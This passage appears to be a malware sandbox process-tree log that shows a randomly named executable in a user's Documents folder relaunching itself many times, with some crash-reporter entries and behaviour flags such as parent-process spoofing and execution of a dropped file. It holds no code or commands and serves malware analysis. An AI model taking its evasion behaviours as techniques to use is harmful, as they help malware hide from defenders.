C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8352 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9720 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10512 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
C:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exeC:\Users\Admin\Documents\ngj6VgNORD6ZXFJhogbAqawS.exe3⤵
-
-
